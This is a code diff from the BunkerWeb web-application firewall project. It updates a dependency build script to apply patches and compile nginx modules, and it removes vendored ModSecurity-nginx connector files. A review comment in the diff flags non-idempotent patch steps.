CHANGE_DIR="/tmp/bunkerweb/deps/src/ModSecurity" do_and_check_cmd ./configure --disable-dependency-tracking --disable-static --disable-examples --disable-doxygen-doc --disable-doxygen-html --disable-valgrind-memcheck --disable-valgrind-helgrind --prefix=/usr/share/bunkerweb/deps --with-maxmind=/usr/share/bunkerweb/deps
|
||||
CHANGE_DIR="/tmp/bunkerweb/deps/src/ModSecurity" do_and_check_cmd make -j $NTASK
|
||||
CHANGE_DIR="/tmp/bunkerweb/deps/src/ModSecurity" do_and_check_cmd make install-strip
|
||||
do_and_check_cmd patch /tmp/bunkerweb/deps/src/modsecurity/configure.ac /tmp/bunkerweb/deps/misc/modsecurity.patch
|
||||
CHANGE_DIR="/tmp/bunkerweb/deps/src/modsecurity" do_and_check_cmd rm -rf others/libinjection
|
||||
do_and_check_cmd cp -r /tmp/bunkerweb/deps/src/libinjection /tmp/bunkerweb/deps/src/modsecurity/others/libinjection
|
||||
cd /tmp/bunkerweb/deps/src/modsecurity && ./build.sh > /dev/null 2>&1
|
||||
CHANGE_DIR="/tmp/bunkerweb/deps/src/modsecurity" do_and_check_cmd sh build.sh
|
||||
CHANGE_DIR="/tmp/bunkerweb/deps/src/modsecurity" do_and_check_cmd ./configure --disable-dependency-tracking --disable-static --disable-examples --disable-doxygen-doc --disable-doxygen-html --disable-valgrind-memcheck --disable-valgrind-helgrind --prefix=/usr/share/bunkerweb/deps --with-maxmind=/usr/share/bunkerweb/deps
|
||||
CHANGE_DIR="/tmp/bunkerweb/deps/src/modsecurity" do_and_check_cmd make -j $NTASK
|
||||
CHANGE_DIR="/tmp/bunkerweb/deps/src/modsecurity" do_and_check_cmd make install-strip
|
||||
|
||||
# Compiling and installing luajit2
|
||||
echo "ℹ️ Compiling and installing luajit2"
|
||||
CHANGE_DIR="/tmp/bunkerweb/deps/src/luajit2" do_and_check_cmd make -j $NTASK
|
||||
CHANGE_DIR="/tmp/bunkerweb/deps/src/luajit2" do_and_check_cmd make PREFIX=/usr/share/bunkerweb/deps install
|
||||
# Compiling and installing luajit
|
||||
echo "ℹ️ Compiling and installing luajit"
|
||||
CHANGE_DIR="/tmp/bunkerweb/deps/src/luajit" do_and_check_cmd make -j $NTASK
|
||||
CHANGE_DIR="/tmp/bunkerweb/deps/src/luajit" do_and_check_cmd make PREFIX=/usr/share/bunkerweb/deps install
|
||||
|
||||
# Installing lua-resty-core
|
||||
echo "ℹ️ Installing openresty/lua-resty-core"
|
||||
|
@ -107,6 +110,7 @@ CHANGE_DIR="/tmp/bunkerweb/deps/src/luasec" do_and_check_cmd make LUACPATH=/usr/
|
|||
|
||||
# Installing lua-resty-ipmatcher
|
||||
echo "ℹ️ Installing lua-resty-ipmatcher"
|
||||
do_and_check_cmd patch /tmp/bunkerweb/deps/src/lua-resty-ipmatcher/resty/ipmatcher.lua /tmp/bunkerweb/deps/misc/ipmatcher.patch
|
||||
CHANGE_DIR="/tmp/bunkerweb/deps/src/lua-resty-ipmatcher" do_and_check_cmd make INST_PREFIX=/usr/share/bunkerweb/deps INST_LIBDIR=/usr/share/bunkerweb/deps/lib/lua INST_LUADIR=/usr/share/bunkerweb/deps/lib/lua install
|
||||
|
||||
# Installing lua-resty-redis
|
||||
|
@ -119,6 +123,7 @@ CHANGE_DIR="/tmp/bunkerweb/deps/src/lua-resty-upload" do_and_check_cmd make PREF
|
|||
|
||||
# Installing lujit-geoip
|
||||
echo "ℹ️ Installing luajit-geoip"
|
||||
do_and_check_cmd patch /tmp/bunkerweb/deps/src/luajit-geoip/geoip/mmdb.lua /tmp/bunkerweb/deps/misc/mmdb.patch
|
||||
do_and_check_cmd cp -r /tmp/bunkerweb/deps/src/luajit-geoip/geoip /usr/share/bunkerweb/deps/lib/lua
|
||||
|
||||
# Installing lbase64
|
||||
|
@ -143,11 +148,13 @@ CHANGE_DIR="/tmp/bunkerweb/deps/src/lua-resty-lock" do_and_check_cmd make PREFIX
|
|||
|
||||
# Installing lua-resty-openssl
|
||||
echo "ℹ️ Installing lua-resty-openssl"
|
||||
do_and_check_cmd rm -r /tmp/bunkerweb/deps/src/lua-resty-openssl/t
|
||||
CHANGE_DIR="/tmp/bunkerweb/deps/src/lua-resty-openssl" do_and_check_cmd make LUA_LIB_DIR=/usr/share/bunkerweb/deps/lib/lua install
|
||||
do_and_check_cmd cp /tmp/bunkerweb/deps/src/lua-resty-openssl/lib/resty/openssl.lua /usr/share/bunkerweb/deps/lib/lua/resty
|
||||
|
||||
# Installing lua-ffi-zlib
|
||||
echo "ℹ️ Installing lua-ffi-zlib"
|
||||
do_and_check_cmd patch /tmp/bunkerweb/deps/src/lua-ffi-zlib/lib/ffi-zlib.lua /tmp/bunkerweb/deps/misc/lua-ffi-zlib.patch
|
||||
do_and_check_cmd cp /tmp/bunkerweb/deps/src/lua-ffi-zlib/lib/ffi-zlib.lua /usr/share/bunkerweb/deps/lib/lua
|
||||
|
||||
# Installing lua-resty-signal
|
||||
|
@ -155,6 +162,12 @@ echo "ℹ️ Installing lua-resty-signal"
|
|||
CHANGE_DIR="/tmp/bunkerweb/deps/src/lua-resty-signal" do_and_check_cmd make PREFIX=/usr/share/bunkerweb/deps -j $NTASK
|
||||
CHANGE_DIR="/tmp/bunkerweb/deps/src/lua-resty-signal" do_and_check_cmd make PREFIX=/usr/share/bunkerweb/deps LUA_LIB_DIR=/usr/share/bunkerweb/deps/lib/lua install
|
||||
|
||||
do_and_check_cmd patch /tmp/bunkerweb/deps/src/modsecurity-nginx/src/ngx_http_modsecurity_log.c /tmp/bunkerweb/deps/misc/modsecurity-nginx.patch
|
||||
do_and_check_cmd patch /tmp/bunkerweb/deps/src/modsecurity-nginx/config /tmp/bunkerweb/deps/misc/config.patch
|
||||
do_and_check_cmd patch /tmp/bunkerweb/deps/src/modsecurity-nginx/src/ngx_http_modsecurity_common.h /tmp/bunkerweb/deps/misc/ngx_http_modsecurity_common.h.patch
|
||||
do_and_check_cmd patch /tmp/bunkerweb/deps/src/modsecurity-nginx/src/ngx_http_modsecurity_module.c /tmp/bunkerweb/deps/misc/ngx_http_modsecurity_module.c.patch
|
||||
do_and_check_cmd cp /tmp/bunkerweb/deps/misc/ngx_http_modsecurity_access.c /tmp/bunkerweb/deps/src/modsecurity-nginx/src
|
||||
|
||||
# Compile dynamic modules
|
||||
echo "ℹ️ Compiling and installing dynamic modules"
|
||||
CONFARGS="$(nginx -V 2>&1 | sed -n -e 's/^.*arguments: //p')"
|
||||
|
@ -164,13 +177,15 @@ CONFARGS="$(echo -n "$CONFARGS" | sed "s/--with-ld-opt='-Wl/--with-ld-opt='-lpcr
|
|||
if [ "$OS" = "fedora" ] ; then
|
||||
CONFARGS="$(echo -n "$CONFARGS" | sed "s/--with-ld-opt='.*'/--with-ld-opt=-lpcre/" | sed "s/--with-cc-opt='.*'//")"
|
||||
fi
|
||||
echo '#!/bin/bash' > "/tmp/bunkerweb/deps/src/nginx-${NGINX_VERSION}/configure-fix.sh"
|
||||
echo "./configure $CONFARGS --add-dynamic-module=/tmp/bunkerweb/deps/src/headers-more-nginx-module --add-dynamic-module=/tmp/bunkerweb/deps/src/nginx_cookie_flag_module --add-dynamic-module=/tmp/bunkerweb/deps/src/lua-nginx-module --add-dynamic-module=/tmp/bunkerweb/deps/src/ngx_brotli --add-dynamic-module=/tmp/bunkerweb/deps/src/ngx_devel_kit --add-dynamic-module=/tmp/bunkerweb/deps/src/stream-lua-nginx-module" --add-dynamic-module=/tmp/bunkerweb/deps/src/ModSecurity-nginx >> "/tmp/bunkerweb/deps/src/nginx-${NGINX_VERSION}/configure-fix.sh"
|
||||
do_and_check_cmd chmod +x "/tmp/bunkerweb/deps/src/nginx-${NGINX_VERSION}/configure-fix.sh"
|
||||
CHANGE_DIR="/tmp/bunkerweb/deps/src/nginx-${NGINX_VERSION}" LUAJIT_LIB="/usr/share/bunkerweb/deps/lib -Wl,-rpath,/usr/share/bunkerweb/deps/lib" LUAJIT_INC="/usr/share/bunkerweb/deps/include/luajit-2.1" MODSECURITY_LIB="/usr/share/bunkerweb/deps/lib" MODSECURITY_INC="/usr/share/bunkerweb/deps/include" do_and_check_cmd ./configure-fix.sh
|
||||
CHANGE_DIR="/tmp/bunkerweb/deps/src/nginx-${NGINX_VERSION}" do_and_check_cmd make -j $NTASK modules
|
||||
|
||||
CHANGE_DIR="/tmp/bunkerweb/deps/src/nginx" do_and_check_cmd mv auto/configure ./
|
||||
echo '#!/bin/bash' > "/tmp/bunkerweb/deps/src/nginx/configure-fix.sh"
|
||||
echo "./configure $CONFARGS --add-dynamic-module=/tmp/bunkerweb/deps/src/headers-more-nginx-module --add-dynamic-module=/tmp/bunkerweb/deps/src/nginx_cookie_flag_module --add-dynamic-module=/tmp/bunkerweb/deps/src/lua-nginx-module --add-dynamic-module=/tmp/bunkerweb/deps/src/ngx_brotli --add-dynamic-module=/tmp/bunkerweb/deps/src/ngx_devel_kit --add-dynamic-module=/tmp/bunkerweb/deps/src/stream-lua-nginx-module" --add-dynamic-module=/tmp/bunkerweb/deps/src/modsecurity-nginx >> "/tmp/bunkerweb/deps/src/nginx/configure-fix.sh"
|
||||
do_and_check_cmd chmod +x "/tmp/bunkerweb/deps/src/nginx/configure-fix.sh"
|
||||
CHANGE_DIR="/tmp/bunkerweb/deps/src/nginx" LUAJIT_LIB="/usr/share/bunkerweb/deps/lib -Wl,-rpath,/usr/share/bunkerweb/deps/lib" LUAJIT_INC="/usr/share/bunkerweb/deps/include/luajit-2.1" MODSECURITY_LIB="/usr/share/bunkerweb/deps/lib" MODSECURITY_INC="/usr/share/bunkerweb/deps/include" do_and_check_cmd ./configure-fix.sh
|
||||
CHANGE_DIR="/tmp/bunkerweb/deps/src/nginx" do_and_check_cmd make -j $NTASK modules
|
||||
do_and_check_cmd mkdir /usr/share/bunkerweb/modules
|
||||
CHANGE_DIR="/tmp/bunkerweb/deps/src/nginx-${NGINX_VERSION}" do_and_check_cmd cp ./objs/*.so /usr/share/bunkerweb/modules
|
||||
CHANGE_DIR="/tmp/bunkerweb/deps/src/nginx" do_and_check_cmd cp ./objs/*.so /usr/share/bunkerweb/modules
|
||||
|
||||
# Dependencies are installed
|
||||
echo "ℹ️ Dependencies for BunkerWeb successfully compiled and installed !"
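Review bot: The `patch` calls added in these hunks (modsecurity `configure.ac`, `ipmatcher.lua`, `mmdb.lua`, `ffi-zlib.lua` and the four modsecurity-nginx files) run unconditionally on every install, whereas the removed clone script applied the same patches only after a fresh clone, behind its `dopatch` flag. If this script is ever run again on an already patched tree under `/tmp/bunkerweb/deps/src`, `patch` will detect a previously applied patch and the step presumably fails through `do_and_check_cmd`; whether the tree is always a fresh copy cannot be seen from these hunks. A guard that tests for the applied state first, such as `patch -R -s -f --dry-run FILE PATCHFILE >/dev/null 2>&1 || do_and_check_cmd patch FILE PATCHFILE`, would make the step repeatable. The modsecurity-nginx block added after the lua-resty-signal install also lacks the comment header and progress `echo` that the other steps have; a `# Patching modsecurity-nginx` line with a matching `echo` would keep the build log readable.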
|
||||
|
|
|
@ -1,192 +0,0 @@
|
|||
# vim: filetype=sh
|
||||
|
||||
# If $NGX_IGNORE_RPATH is set to "YES", we will ignore explicit
|
||||
# library path specification on resulting binary, allowing libmodsecurity.so
|
||||
# to be relocated across configured library pathes (adjust /etc/ld.so.conf
|
||||
# or set $LD_LIBRARY_PATH environment variable to manage them)
|
||||
#
|
||||
# $YAJL_LIB variable may need to be populated in case of non-standard
|
||||
# path of libyajl.so's installation
|
||||
|
||||
ngx_feature_name=
|
||||
ngx_feature_run=no
|
||||
ngx_feature_incs="#include <modsecurity/modsecurity.h>"
|
||||
ngx_feature_libs="-lmodsecurity"
|
||||
ngx_feature_test='printf("hello");'
|
||||
ngx_modsecurity_opt_I=
|
||||
ngx_modsecurity_opt_L=
|
||||
|
||||
YAJL_EXTRA=
|
||||
if test -n "$YAJL_LIB"; then
|
||||
YAJL_EXTRA="-L$YAJL_LIB -lyajl"
|
||||
fi
|
||||
|
||||
# If $MODSECURITY_INC is specified, lets use it. Otherwise lets try
|
||||
# the default paths
|
||||
#
|
||||
if [ -n "$MODSECURITY_INC" -o -n "$MODSECURITY_LIB" ]; then
|
||||
# explicitly set ModSecurity lib path
|
||||
ngx_feature="ModSecurity library in \"$MODSECURITY_LIB\" and \"$MODSECURITY_INC\" (specified by the MODSECURITY_LIB and MODSECURITY_INC env)"
|
||||
ngx_feature_path="$MODSECURITY_INC"
|
||||
ngx_modsecurity_opt_I="-I$MODSECURITY_INC"
|
||||
ngx_modsecurity_opt_L="-L$MODSECURITY_LIB $YAJL_EXTRA"
|
||||
|
||||
if [ $NGX_RPATH = YES ]; then
|
||||
ngx_feature_libs="-R$MODSECURITY_LIB -L$MODSECURITY_LIB -lmodsecurity $YAJL_EXTRA"
|
||||
elif [ "$NGX_IGNORE_RPATH" != "YES" -a $NGX_SYSTEM = "Linux" ]; then
|
||||
ngx_feature_libs="-Wl,-rpath,$MODSECURITY_LIB -L$MODSECURITY_LIB -lmodsecurity $YAJL_EXTRA"
|
||||
else
|
||||
ngx_feature_libs="-L$MODSECURITY_LIB -lmodsecurity $YAJL_EXTRA"
|
||||
fi
|
||||
|
||||
. auto/feature
|
||||
|
||||
if [ $ngx_found = no ]; then
|
||||
cat << END
|
||||
$0: error: ngx_http_modsecurity_module requires the ModSecurity library and MODSECURITY_LIB is defined as "$MODSECURITY_LIB" and MODSECURITY_INC (path for modsecurity.h) "$MODSECURITY_INC", but we cannot find ModSecurity there.
|
||||
END
|
||||
exit 1
|
||||
fi
|
||||
else
|
||||
# auto-discovery
|
||||
ngx_feature="ModSecurity library"
|
||||
ngx_feature_libs="-lmodsecurity"
|
||||
|
||||
. auto/feature
|
||||
|
||||
if [ $ngx_found = no ]; then
|
||||
ngx_feature="ModSecurity library in /usr/local/modsecurity"
|
||||
ngx_feature_path="/usr/local/modsecurity/include"
|
||||
if [ $NGX_RPATH = YES ]; then
|
||||
ngx_feature_libs="-R/usr/local/modsecurity/lib -L/usr/local/modsecurity/lib -lmodsecurity"
|
||||
elif [ "$NGX_IGNORE_RPATH" != "YES" -a $NGX_SYSTEM = "Linux" ]; then
|
||||
ngx_feature_libs="-Wl,-rpath,/usr/local/modsecurity/lib -L/usr/local/modsecurity/lib -lmodsecurity"
|
||||
else
|
||||
ngx_feature_libs="-L/usr/local/modsecurity/lib -lmodsecurity"
|
||||
fi
|
||||
|
||||
. auto/feature
|
||||
|
||||
fi
|
||||
fi
|
||||
|
||||
|
||||
|
||||
if [ $ngx_found = no ]; then
|
||||
cat << END
|
||||
$0: error: ngx_http_modsecurity_module requires the ModSecurity library.
|
||||
END
|
||||
exit 1
|
||||
fi
|
||||
|
||||
|
||||
ngx_addon_name=ngx_http_modsecurity_module
|
||||
|
||||
# We must place ngx_http_modsecurity_module after ngx_http_gzip_filter_module
|
||||
# in load order list to be able to read response body before it gets compressed
|
||||
# (for filter modules later initialization means earlier execution).
|
||||
#
|
||||
# Nginx implements load ordering only for dynamic modules and only a BEFORE part
|
||||
# of "ngx_module_order". So we list all of the modules that come after
|
||||
# ngx_http_gzip_filter_module as a BEFORE dependency for
|
||||
# ngx_http_modsecurity_module.
|
||||
#
|
||||
# For static compilation HTTP_FILTER_MODULES will be patched later.
|
||||
|
||||
modsecurity_dependency="ngx_http_postpone_filter_module \
|
||||
ngx_http_ssi_filter_module \
|
||||
ngx_http_charset_filter_module \
|
||||
ngx_http_xslt_filter_module \
|
||||
ngx_http_image_filter_module \
|
||||
ngx_http_sub_filter_module \
|
||||
ngx_http_addition_filter_module \
|
||||
ngx_http_gunzip_filter_module \
|
||||
ngx_http_userid_filter_module \
|
||||
ngx_http_headers_filter_module \
|
||||
ngx_http_copy_filter_module"
|
||||
|
||||
|
||||
if test -n "$ngx_module_link"; then
|
||||
ngx_module_type=HTTP_FILTER
|
||||
ngx_module_name="$ngx_addon_name"
|
||||
ngx_module_srcs="$ngx_addon_dir/src/ngx_http_modsecurity_module.c \
|
||||
$ngx_addon_dir/src/ngx_http_modsecurity_access.c \
|
||||
$ngx_addon_dir/src/ngx_http_modsecurity_header_filter.c \
|
||||
$ngx_addon_dir/src/ngx_http_modsecurity_body_filter.c \
|
||||
$ngx_addon_dir/src/ngx_http_modsecurity_log.c \
|
||||
$ngx_addon_dir/src/ngx_http_modsecurity_rewrite.c \
|
||||
"
|
||||
ngx_module_deps="$ngx_addon_dir/src/ddebug.h \
|
||||
$ngx_addon_dir/src/ngx_http_modsecurity_common.h \
|
||||
"
|
||||
ngx_module_libs="$ngx_feature_libs"
|
||||
ngx_module_incs="$ngx_feature_path"
|
||||
|
||||
ngx_module_order="ngx_http_chunked_filter_module \
|
||||
ngx_http_v2_filter_module \
|
||||
ngx_http_range_header_filter_module \
|
||||
ngx_http_gzip_filter_module \
|
||||
$ngx_module_name \
|
||||
$modsecurity_dependency";
|
||||
|
||||
. auto/module
|
||||
else
|
||||
CFLAGS="$ngx_modsecurity_opt_I $CFLAGS"
|
||||
NGX_LD_OPT="$ngx_modsecurity_opt_L $NGX_LD_OPT"
|
||||
|
||||
CORE_INCS="$CORE_INCS $ngx_feature_path"
|
||||
CORE_LIBS="$CORE_LIBS $ngx_feature_libs"
|
||||
|
||||
HTTP_FILTER_MODULES="$HTTP_FILTER_MODULES ngx_http_modsecurity_module"
|
||||
NGX_ADDON_SRCS="\
|
||||
$NGX_ADDON_SRCS \
|
||||
$ngx_addon_dir/src/ngx_http_modsecurity_module.c \
|
||||
$ngx_addon_dir/src/ngx_http_modsecurity_access.c \
|
||||
$ngx_addon_dir/src/ngx_http_modsecurity_header_filter.c \
|
||||
$ngx_addon_dir/src/ngx_http_modsecurity_body_filter.c \
|
||||
$ngx_addon_dir/src/ngx_http_modsecurity_log.c \
|
||||
$ngx_addon_dir/src/ngx_http_modsecurity_rewrite.c \
|
||||
"
|
||||
|
||||
NGX_ADDON_DEPS="\
|
||||
$NGX_ADDON_DEPS \
|
||||
$ngx_addon_dir/src/ddebug.h \
|
||||
$ngx_addon_dir/src/ngx_http_modsecurity_common.h \
|
||||
"
|
||||
fi
|
||||
|
||||
#
|
||||
# Nginx does not provide reliable way to introduce our module into required
|
||||
# place in static ($ngx_module_link=ADDON) compilation mode, so we must
|
||||
# explicitly update module "ordering rules".
|
||||
#
|
||||
if [ "$ngx_module_link" != DYNAMIC ] ; then
|
||||
# Reposition modsecurity module to satisfy $modsecurity_dependency
|
||||
# (this mimics dependency resolution made by ngx_add_module() function
|
||||
# though less optimal in terms of computational complexity).
|
||||
modules=
|
||||
found=
|
||||
for module in $HTTP_FILTER_MODULES; do
|
||||
# skip our module name from the original list
|
||||
if [ "$module" = "$ngx_addon_name" ]; then
|
||||
continue
|
||||
fi
|
||||
if [ -z "${found}" ]; then
|
||||
for item in $modsecurity_dependency; do
|
||||
if [ "$module" = "$item" ]; then
|
||||
modules="${modules} $ngx_addon_name"
|
||||
found=1
|
||||
break
|
||||
fi
|
||||
done
|
||||
fi
|
||||
modules="${modules} $module"
|
||||
done
|
||||
if [ -z "${found}" ]; then
|
||||
# This must never happen since ngx_http_copy_filter_module must be in HTTP_FILTER_MODULES
|
||||
# and we stated dependency on it in $modsecurity_dependency
|
||||
echo "$0: error: cannot reposition modsecurity module in HTTP_FILTER_MODULES list"
|
||||
exit 1
|
||||
fi
|
||||
HTTP_FILTER_MODULES="${modules}"
|
||||
fi
|
|
@ -1,228 +0,0 @@
|
|||
/*
|
||||
* ModSecurity connector for nginx, http://www.modsecurity.org/
|
||||
* Copyright (c) 2015 Trustwave Holdings, Inc. (http://www.trustwave.com/)
|
||||
*
|
||||
* You may not use this file except in compliance with
|
||||
* the License. You may obtain a copy of the License at
|
||||
*
|
||||
* http://www.apache.org/licenses/LICENSE-2.0
|
||||
*
|
||||
* If any of the files related to licensing are missing or if you have any
|
||||
* other questions related to licensing please contact Trustwave Holdings, Inc.
|
||||
* directly using the email address security@modsecurity.org.
|
||||
*
|
||||
*/
|
||||
|
||||
#ifndef MODSECURITY_DDEBUG
|
||||
#define MODSECURITY_DDEBUG 0
|
||||
#endif
|
||||
#include "ddebug.h"
|
||||
|
||||
#include "ngx_http_modsecurity_common.h"
|
||||
|
||||
void
|
||||
ngx_http_modsecurity_request_read(ngx_http_request_t *r)
|
||||
{
|
||||
ngx_http_modsecurity_ctx_t *ctx;
|
||||
|
||||
ctx = ngx_http_get_module_ctx(r, ngx_http_modsecurity_module);
|
||||
|
||||
#if defined(nginx_version) && nginx_version >= 8011
|
||||
r->main->count--;
|
||||
#endif
|
||||
|
||||
if (ctx->waiting_more_body)
|
||||
{
|
||||
ctx->waiting_more_body = 0;
|
||||
r->write_event_handler = ngx_http_core_run_phases;
|
||||
ngx_http_core_run_phases(r);
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
ngx_int_t
|
||||
ngx_http_modsecurity_access_handler(ngx_http_request_t *r)
|
||||
{
|
||||
#if 1
|
||||
ngx_pool_t *old_pool;
|
||||
ngx_http_modsecurity_ctx_t *ctx;
|
||||
ngx_http_modsecurity_conf_t *mcf;
|
||||
|
||||
dd("catching a new _access_ phase handler");
|
||||
|
||||
mcf = ngx_http_get_module_loc_conf(r, ngx_http_modsecurity_module);
|
||||
if (mcf == NULL || mcf->enable != 1)
|
||||
{
|
||||
dd("ModSecurity not enabled... returning");
|
||||
return NGX_DECLINED;
|
||||
}
|
||||
/*
|
||||
* FIXME:
|
||||
* In order to perform some tests, let's accept everything.
|
||||
*
|
||||
if (r->method != NGX_HTTP_GET &&
|
||||
r->method != NGX_HTTP_POST && r->method != NGX_HTTP_HEAD) {
|
||||
dd("ModSecurity is not ready to deal with anything different from " \
|
||||
"POST, GET or HEAD");
|
||||
return NGX_DECLINED;
|
||||
}
|
||||
*/
|
||||
|
||||
ctx = ngx_http_get_module_ctx(r, ngx_http_modsecurity_module);
|
||||
|
||||
dd("recovering ctx: %p", ctx);
|
||||
|
||||
if (ctx == NULL)
|
||||
{
|
||||
dd("ctx is null; Nothing we can do, returning an error.");
|
||||
return NGX_HTTP_INTERNAL_SERVER_ERROR;
|
||||
}
|
||||
|
||||
if (ctx->intervention_triggered) {
|
||||
return NGX_DECLINED;
|
||||
}
|
||||
|
||||
if (ctx->waiting_more_body == 1)
|
||||
{
|
||||
dd("waiting for more data before proceed. / count: %d",
|
||||
r->main->count);
|
||||
|
||||
return NGX_DONE;
|
||||
}
|
||||
|
||||
if (ctx->body_requested == 0)
|
||||
{
|
||||
ngx_int_t rc = NGX_OK;
|
||||
|
||||
ctx->body_requested = 1;
|
||||
|
||||
dd("asking for the request body, if any. Count: %d",
|
||||
r->main->count);
|
||||
/**
|
||||
* TODO: Check if there is any benefit to use request_body_in_single_buf set to 1.
|
||||
*
|
||||
* saw some module using this request_body_in_single_buf
|
||||
* but not sure what exactly it does, same for the others options below.
|
||||
*
|
||||
* r->request_body_in_single_buf = 1;
|
||||
*/
|
||||
r->request_body_in_single_buf = 1;
|
||||
r->request_body_in_persistent_file = 1;
|
||||
if (!r->request_body_in_file_only) {
|
||||
// If the above condition fails, then the flag below will have been
|
||||
// set correctly elsewhere. We need to set the flag here for other
|
||||
// conditions (client_body_in_file_only not used but
|
||||
// client_body_buffer_size is)
|
||||
r->request_body_in_clean_file = 1;
|
||||
}
|
||||
|
||||
rc = ngx_http_read_client_request_body(r,
|
||||
ngx_http_modsecurity_request_read);
|
||||
if (rc == NGX_ERROR || rc >= NGX_HTTP_SPECIAL_RESPONSE) {
|
||||
#if (nginx_version < 1002006) || \
|
||||
(nginx_version >= 1003000 && nginx_version < 1003009)
|
||||
r->main->count--;
|
||||
#endif
|
||||
|
||||
return rc;
|
||||
}
|
||||
if (rc == NGX_AGAIN)
|
||||
{
|
||||
dd("nginx is asking us to wait for more data.");
|
||||
|
||||
ctx->waiting_more_body = 1;
|
||||
return NGX_DONE;
|
||||
}
|
||||
}
|
||||
|
||||
if (ctx->waiting_more_body == 0)
|
||||
{
|
||||
int ret = 0;
|
||||
int already_inspected = 0;
|
||||
|
||||
dd("request body is ready to be processed");
|
||||
|
||||
r->write_event_handler = ngx_http_core_run_phases;
|
||||
|
||||
ngx_chain_t *chain = r->request_body->bufs;
|
||||
|
||||
/**
|
||||
* TODO: Speed up the analysis by sending chunk while they arrive.
|
||||
*
|
||||
* Notice that we are waiting for the full request body to
|
||||
* start to process it, it may not be necessary. We may send
|
||||
* the chunks to ModSecurity while nginx keep calling this
|
||||
* function.
|
||||
*/
|
||||
|
||||
if (r->request_body->temp_file != NULL) {
|
||||
ngx_str_t file_path = r->request_body->temp_file->file.name;
|
||||
const char *file_name = ngx_str_to_char(file_path, r->pool);
|
||||
if (file_name == (char*)-1) {
|
||||
return NGX_HTTP_INTERNAL_SERVER_ERROR;
|
||||
}
|
||||
/*
|
||||
* Request body was saved to a file, probably we don't have a
|
||||
* copy of it in memory.
|
||||
*/
|
||||
dd("request body inspection: file -- %s", file_name);
|
||||
|
||||
msc_request_body_from_file(ctx->modsec_transaction, file_name);
|
||||
|
||||
already_inspected = 1;
|
||||
} else {
|
||||
dd("inspection request body in memory.");
|
||||
}
|
||||
|
||||
while (chain && !already_inspected)
|
||||
{
|
||||
u_char *data = chain->buf->pos;
|
||||
|
||||
msc_append_request_body(ctx->modsec_transaction, data,
|
||||
chain->buf->last - data);
|
||||
|
||||
if (chain->buf->last_buf) {
|
||||
break;
|
||||
}
|
||||
chain = chain->next;
|
||||
|
||||
/* XXX: chains are processed one-by-one, maybe worth to pass all chains and then call intervention() ? */
|
||||
|
||||
/**
|
||||
* ModSecurity may perform stream inspection on this buffer,
|
||||
* it may ask for a intervention in consequence of that.
|
||||
*
|
||||
*/
|
||||
ret = ngx_http_modsecurity_process_intervention(ctx->modsec_transaction, r, 0);
|
||||
if (ret > 0) {
|
||||
return ret;
|
||||
}
|
||||
}
|
||||
|
||||
/**
|
||||
* At this point, all the request body was sent to ModSecurity
|
||||
* and we want to make sure that all the request body inspection
|
||||
* happened; consequently we have to check if ModSecurity have
|
||||
* returned any kind of intervention.
|
||||
*/
|
||||
|
||||
/* XXX: once more -- is body can be modified ? content-length need to be adjusted ? */
|
||||
|
||||
old_pool = ngx_http_modsecurity_pcre_malloc_init(r->pool);
|
||||
msc_process_request_body(ctx->modsec_transaction);
|
||||
ngx_http_modsecurity_pcre_malloc_done(old_pool);
|
||||
|
||||
ret = ngx_http_modsecurity_process_intervention(ctx->modsec_transaction, r, 0);
|
||||
if (r->error_page) {
|
||||
return NGX_DECLINED;
|
||||
}
|
||||
if (ret > 0) {
|
||||
return ret;
|
||||
}
|
||||
}
|
||||
|
||||
dd("Nothing to add on the body inspection, reclaiming a NGX_DECLINED");
|
||||
#endif
|
||||
return NGX_DECLINED;
|
||||
}
|
||||
|
|
@ -1,173 +0,0 @@
|
|||
/*
|
||||
* ModSecurity connector for nginx, http://www.modsecurity.org/
|
||||
* Copyright (c) 2015 Trustwave Holdings, Inc. (http://www.trustwave.com/)
|
||||
*
|
||||
* You may not use this file except in compliance with
|
||||
* the License. You may obtain a copy of the License at
|
||||
*
|
||||
* http://www.apache.org/licenses/LICENSE-2.0
|
||||
*
|
||||
* If any of the files related to licensing are missing or if you have any
|
||||
* other questions related to licensing please contact Trustwave Holdings, Inc.
|
||||
* directly using the email address security@modsecurity.org.
|
||||
*
|
||||
*/
|
||||
|
||||
|
||||
#ifndef _NGX_HTTP_MODSECURITY_COMMON_H_INCLUDED_
|
||||
#define _NGX_HTTP_MODSECURITY_COMMON_H_INCLUDED_
|
||||
|
||||
#include <nginx.h>
|
||||
#include <ngx_config.h>
|
||||
#include <ngx_core.h>
|
||||
#include <ngx_http.h>
|
||||
|
||||
#include <modsecurity/modsecurity.h>
|
||||
#include <modsecurity/transaction.h>
|
||||
|
||||
|
||||
/* #define MSC_USE_RULES_SET 1 */
|
||||
|
||||
#if defined(MODSECURITY_CHECK_VERSION)
|
||||
#if MODSECURITY_VERSION_NUM >= 304010
|
||||
#define MSC_USE_RULES_SET 1
|
||||
#endif
|
||||
#endif
|
||||
|
||||
#if defined(MSC_USE_RULES_SET)
|
||||
#include <modsecurity/rules_set.h>
|
||||
#else
|
||||
#include <modsecurity/rules.h>
|
||||
#endif
|
||||
|
||||
|
||||
/**
|
||||
* TAG_NUM:
|
||||
*
|
||||
* Alpha - 001
|
||||
* Beta - 002
|
||||
* Dev - 010
|
||||
* Rc1 - 051
|
||||
* Rc2 - 052
|
||||
* ... - ...
|
||||
* Release- 100
|
||||
*
|
||||
*/
|
||||
|
||||
#define MODSECURITY_NGINX_MAJOR "1"
|
||||
#define MODSECURITY_NGINX_MINOR "0"
|
||||
#define MODSECURITY_NGINX_PATCHLEVEL "3"
|
||||
#define MODSECURITY_NGINX_TAG ""
|
||||
#define MODSECURITY_NGINX_TAG_NUM "100"
|
||||
|
||||
#define MODSECURITY_NGINX_VERSION MODSECURITY_NGINX_MAJOR "." \
|
||||
MODSECURITY_NGINX_MINOR "." MODSECURITY_NGINX_PATCHLEVEL \
|
||||
MODSECURITY_NGINX_TAG
|
||||
|
||||
#define MODSECURITY_NGINX_VERSION_NUM MODSECURITY_NGINX_MAJOR \
|
||||
MODSECURITY_NGINX_MINOR MODSECURITY_NGINX_PATCHLEVEL \
|
||||
MODSECURITY_NGINX_TAG_NUM
|
||||
|
||||
#define MODSECURITY_NGINX_WHOAMI "ModSecurity-nginx v" \
|
||||
MODSECURITY_NGINX_VERSION
|
||||
|
||||
typedef struct {
|
||||
ngx_str_t name;
|
||||
ngx_str_t value;
|
||||
} ngx_http_modsecurity_header_t;
|
||||
|
||||
|
||||
typedef struct {
|
||||
ngx_http_request_t *r;
|
||||
Transaction *modsec_transaction;
|
||||
ModSecurityIntervention *delayed_intervention;
|
||||
